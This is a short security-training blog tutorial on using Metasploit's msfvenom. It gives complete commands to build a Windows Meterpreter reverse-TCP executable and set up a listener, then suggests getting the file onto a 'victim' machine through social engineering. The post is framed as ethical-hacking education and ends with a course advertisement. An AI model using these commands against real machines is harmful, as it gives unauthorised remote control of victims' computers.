How to use msfvenom

Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.

Entering from the ubuntu terminal with root user.

The new tool msfvenom incorporates a help in the terminal itself so that we know the “flags” that we can use, to enter this help it is enough to type:

To see what payloads are available from Framework, you can do:

msf5> msfvenom -l payloads

or

# msfvenom -l payloads

How to generate a payload

This command uses msfvenom to create a malicious executable file that will open a Meterpreter session using a reverse TCP payload. The listening host is your own computer.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.14 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/infoecaddicts.exe

We have created our malicious file called infosecaddicts.

This handler will listen for the payload and attempt to open a Meterpreter session onto the victim’s
computer.

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.14
msf> set LPORT 4444
msf> run

After creating our malicious file we just have to get it to the victim machine and execute it, you can use social engineering or any other method.

As a result, you will have the meterpreter session.

In the same way that we did it for windows we can do it for any other operating system for examples: Android, iOS, Liniux etc …

Resources:

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

If you are interested in learning more, we invite you to review this course.

Ultimate Hacklab Self Paced

Try Certified Ethical Hacker for FREE!!!

Avatar

This post was written by Ruben Dario Caravajal Herrera